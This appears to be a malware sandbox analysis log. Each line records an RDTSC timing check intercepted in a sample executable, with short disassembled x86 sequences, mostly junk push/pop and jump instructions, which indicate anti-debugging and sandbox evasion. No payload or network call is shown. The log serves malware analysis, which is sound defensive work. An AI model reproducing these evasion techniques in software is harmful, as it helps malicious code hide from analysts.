Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDEFA9 second address: DDEFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF087 second address: DDF08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF08D second address: DDF091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF1C4 second address: DDF216 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F43C9098CECh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F43C9098CF3h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F43C9098CF4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F43C9098CEBh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF216 second address: DDF2AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jnl 00007F43C8AE008Dh 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F43C8AE0078h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e call 00007F43C8AE0083h 0x00000033 pop ecx 0x00000034 push 00000003h 0x00000036 mov edi, dword ptr [ebp+122D2C19h] 0x0000003c push 00000000h 0x0000003e cld 0x0000003f or dword ptr [ebp+122D383Bh], edi 0x00000045 push 00000003h 0x00000047 jmp 00007F43C8AE007Ch 0x0000004c call 00007F43C8AE0079h 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF2AC second address: DDF2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF2B0 second address: DDF2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F43C8AE007Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007F43C8AE0096h 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F43C8AE0076h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF2D6 second address: DDF2F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF2F5 second address: DDF2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF2F9 second address: DDF337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F43C9098CF7h 0x00000010 pop eax 0x00000011 or edi, 25FE2CFCh 0x00000017 lea ebx, dword ptr [ebp+12463DC2h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jnl 00007F43C9098CECh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF337 second address: DDF33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDF33D second address: DDF341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD6BF6 second address: DD6C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFE9DA second address: DFE9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F43C9098CEEh 0x0000000b jmp 00007F43C9098CEBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFE9F9 second address: DFE9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFECB8 second address: DFECBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFECBD second address: DFECC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFF2FC second address: DFF32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F43C9098CF6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFF32C second address: DFF336 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFF87E second address: DFF88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFF9FE second address: DFFA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFFA05 second address: DFFA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007F43C9098CE6h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F43C9098CF7h 0x00000017 jmp 00007F43C9098CF6h 0x0000001c popad 0x0000001d jng 00007F43C9098CE8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFFA4D second address: DFFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD0011 second address: DD0019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DFFBB6 second address: DFFBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E001E6 second address: E00206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C9098CECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F43C9098CF2h 0x00000011 jnp 00007F43C9098CE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E00332 second address: E00338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E00338 second address: E0035F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C9098CEFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0035F second address: E00365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E00365 second address: E00369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E00369 second address: E0036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E004C2 second address: E004C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E004C6 second address: E004E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F43C8AE0084h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E004E2 second address: E00535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C9098D13h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007F43C9098CF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0092E second address: E00932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E00932 second address: E0095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 jmp 00007F43C9098CF5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0095C second address: E00966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DCC936 second address: DCC954 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DCC954 second address: DCC95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E057AA second address: E057B4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E07A6D second address: E07A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD35F9 second address: DD35FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD35FF second address: DD3605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD3605 second address: DD3623 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F43C9098CE8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD3623 second address: DD3627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DD3627 second address: DD3639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0A1C0 second address: E0A1E4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0081h 0x00000008 jmp 00007F43C8AE007Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F43C8AE007Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0B3F4 second address: E0B3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0F445 second address: E0F450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0F450 second address: E0F457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0FB5D second address: E0FB61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0FB61 second address: E0FB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0FB67 second address: E0FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F43C8AE008Ah 0x0000000d jnc 00007F43C8AE0078h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E0FD04 second address: E0FD09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E12250 second address: E12254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1240B second address: E12416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F43C9098CE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E12416 second address: E1241B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1241B second address: E12421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E12957 second address: E1295C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1295C second address: E12966 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E12DAD second address: E12DCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F43C8AE0076h 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 jnc 00007F43C8AE0076h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E12F11 second address: E12F37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 0A14A744h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E12F37 second address: E12F4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F43C8AE0076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 jg 00007F43C8AE007Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E143FB second address: E14400 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E167BA second address: E167CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E16E0F second address: E16E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1A413 second address: E1A46D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F43C8AE0078h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D18D8h] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D2DBCh], esi 0x00000034 push 00000000h 0x00000036 mov edi, 1F4D0A95h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F43C8AE0084h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1A46D second address: E1A472 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DC43D1 second address: DC4428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a js 00007F43C8AE0084h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F43C8AE007Ch 0x00000017 push edx 0x00000018 jc 00007F43C8AE0076h 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F43C8AE0082h 0x00000028 jmp 00007F43C8AE0088h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1DA99 second address: E1DAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1DAA7 second address: E1DAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E1DAAC second address: E1DAFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C9098CF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2873h], edx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2A85h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F43C9098CE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push eax 0x00000036 push ecx 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2094D second address: E2096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F43C8AE007Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E21DB2 second address: E21DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E21DB6 second address: E21DC0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DCE4CE second address: DCE4D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E283D4 second address: E283F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E283F4 second address: E283F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E283F8 second address: E2845B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, ebx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F43C8AE0078h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jnp 00007F43C8AE007Ah 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F43C8AE0078h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D35DEh], eax 0x0000004e xor dword ptr [ebp+124A1BD8h], eax 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2845B second address: E28466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E28466 second address: E2846A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E29421 second address: E29427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E29427 second address: E2942B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2A58A second address: E2A59E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2A59E second address: E2A5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2A5BB second address: E2A5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2B69F second address: E2B6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E2B6A3 second address: E2B6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E21F64 second address: E21F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
